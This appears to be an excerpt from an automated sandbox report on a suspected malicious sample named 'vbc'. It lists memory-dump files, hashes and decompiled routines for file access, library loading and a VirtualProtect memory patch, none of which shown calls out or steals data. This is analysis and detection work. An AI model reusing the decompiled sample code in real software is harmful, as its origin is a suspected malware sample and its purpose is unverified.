Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
Instruction ID: 637f0bbede897030ab690e2e99e2181d797c58f7d0d2aab6e1f53bdf2be6ce4b
Opcode Fuzzy Hash: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
Instruction Fuzzy Hash: 9501F432624220ABE7195B389D05B2A3698E751314F10C13FF955F69F1EA78CC02DB4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040564F Relevance: 3.0, APIs: 2, Instructions: 32
comCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040564F(signed int __eax) {
				struct HWND__* _v0;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x7a8a88;
				_t10 =  *0x7a8a8c;
				__imp__OleInitialize(0); // executed
				 *0x7a8b20 =  *0x7a8b20 | __eax;
				E004044C2(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					while(1) {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
							break;
						}
						_t12 = _t12 + 0x818;
						if(_t10 != 0) {
							continue;
						} else {
						}
						goto L7;
					}
					 *0x7a8aec =  *0x7a8aec + 1;
				}
				L7:
				E004044C2(0x404);
				__imp__OleUninitialize();
				return  *0x7a8aec;
			}

0x00405650
0x00405657
0x0040565f
0x00405665
0x0040566d
0x00405674
0x00405676
0x00405679
0x00405679
0x0040567e
0x00000000
0x00000000
0x0040568f
0x00405697
0x00000000
0x00000000
0x00405699
0x00000000
0x00405697
0x0040569b
0x0040569b
0x004056a1
0x004056a6
0x004056ab
0x004056b8

APIs

OleInitialize.OLE32(00000000), ref: 0040565F

Part of subcall function 004044C2: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4

OleUninitialize.OLE32 ref: 004056AB

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: 87b30d2b785286fdc66c83050ab24e3334c98b30792f2f1f5f727908fd7dcf92
Instruction ID: aa0e5c346db56849faed3f3240e829529484723dbc79c21abe6f002b31812de8
Opcode Fuzzy Hash: 87b30d2b785286fdc66c83050ab24e3334c98b30792f2f1f5f727908fd7dcf92
Instruction Fuzzy Hash: 87F096735005008BD3415754AD05B577364EBC5315F49C93BEF8CA22A0DB7A48118B5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 393b5c21bb7cc3de8bedbfe4bad105ee39a9eabd1884b7fb5bcfa8057cf0f7ce
Instruction ID: 6c41119d880c6e907524726e204bf21ac727531236896e2a35a455d3971ed6d0
Opcode Fuzzy Hash: 393b5c21bb7cc3de8bedbfe4bad105ee39a9eabd1884b7fb5bcfa8057cf0f7ce
Instruction Fuzzy Hash: 62E01272908211CFE705EBA4EE495AE77B4EB40315710497FE501F11D1DBB94D00865D

Uniqueness

Uniqueness Score: -1.00%

Function 004068E7 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004068E7(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E00406877(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x004068ef
0x004068f2
0x004068f9
0x00406901
0x0040690d
0x00000000
0x00406914
0x00406904
0x0040690b
0x00000000
0x0040691c
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
GetProcAddress.KERNEL32(00000000,?), ref: 00406914

Part of subcall function 00406877: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
Part of subcall function 00406877: wsprintfW.USER32 ref: 004068C9
Part of subcall function 00406877: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction ID: 6423a29397ed7bff7b22ace80297d9bc35d616ea5f013efbaa2f78a15a639a79
Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction Fuzzy Hash: CEE08673504210AAE21196716E44C7773A89F89740316443FF946F2080D738DC359AAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040600A Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040600A(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x0040600e
0x0040601b
0x00406030
0x00406036

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,007B6800,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406030

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405FE5 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405FE5(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405fea
0x00405ff0
0x00405ff5
0x00405ffe
0x00405ffe
0x00406007

APIs

GetFileAttributesW.KERNELBASE(?,?,00405BEA,?,?,00000000,00405DC0,?,?,?,?), ref: 00405FEA
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FFE

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: e4d3e829c0d5e7da9196b8d45c2199d6a51b20c6ab53065100e3d1aec4738abc
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 4CD01272504130BFC2102728EF0C89BBF95EF64375B024B35FAA5A22F0CB304C638A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405AC8 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AC8(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405ace
0x00405ad6
0x00000000
0x00405adc
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
GetLastError.KERNEL32 ref: 00405ADC

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 96bb703f3db892353912e36940962cdd7e9d34b0f70b6f3c067145efd4a10b7e
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 95C04C30344601AEDA105B219E48B1B7AD4DB50741F26853D6146F41A0EA788455DD3D

Uniqueness

Uniqueness Score: -1.00%

Function 0040608D Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040608D(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00406091
0x004060a1
0x004060a9
0x00000000
0x004060b0
0x00000000
0x004060b2

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060A1

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 9ce5220da9ed3c49ab8c05536da5923326b58a2142fda2ae973167115508ceb5
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: 2DE08632140259ABCF119E518C00AEB376CFB05350F018472F911E2240D630E82187A5

Uniqueness

Uniqueness Score: -1.00%

Function 004060BC Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060BC(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060c0
0x004060d0
0x004060d8
0x00000000
0x004060df
0x00000000
0x004060e1

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060D0

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: ff7f98053b8daf8dc00d9e724bd7773b369301681fd057c4f0a19a08aea0fefc
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: AEE0EC3225426AABDF10AF659C00AEB7BACFB15360F018437FA56E3190D631E83197A4

Uniqueness

Uniqueness Score: -1.00%

Function 734F2A7F Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x734f5048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x734f505c, 4, 0x40, 0x734f504c); // executed
					 *0x734f505c = 0xc2;
					 *0x734f504c = 0;
					 *0x734f5054 = 0;
					 *0x734f5068 = 0;
					 *0x734f5058 = 0;
					 *0x734f5050 = 0;
					 *0x734f5060 = 0;
					 *0x734f505e = 0;
				}
				return 1;
			}

0x734f2a88
0x734f2a8d
0x734f2a9d
0x734f2aa5
0x734f2aac
0x734f2ab1
0x734f2ab6
0x734f2abb
0x734f2ac0
0x734f2ac5
0x734f2aca
0x734f2aca
0x734f2ad2

APIs

VirtualProtect.KERNELBASE(734F505C,00000004,00000040,734F504C), ref: 734F2A9D

Memory Dump Source

Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true

Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: cba72d9d65bb3c1eaea94b65d0afbd7cda36b9ef51b3022fa2ce7a7cbfd48be2
Instruction ID: dfd96dcbab987fca718179b10e64d90dd0ba2f3a5777b4db7b1f12f4caccacc4
Opcode Fuzzy Hash: cba72d9d65bb3c1eaea94b65d0afbd7cda36b9ef51b3022fa2ce7a7cbfd48be2
Instruction Fuzzy Hash: D1F092F2940282EFC358EF2A8444B0A3FE0F74A304F2D45AAE19CF6242E3344264CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004044C2 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044C2(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x7a7a38;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004044c2
0x004044c9
0x004044d4
0x00000000
0x004044d4
0x004044da

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
Instruction ID: ac3b44bde4cff7d728b8f73da7dc3c4418e617d20a2d9e9616a9aba5531653cc
Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
Instruction Fuzzy Hash: 4FC04C75744600BAEA148F549E45F0677546790701F14C429B641B54D0CA74D410DA2C

Uniqueness

Uniqueness Score: -1.00%

Function 004034C2 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034C2(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004034d0
0x004034d6

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040385A,?), ref: 004034D0

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
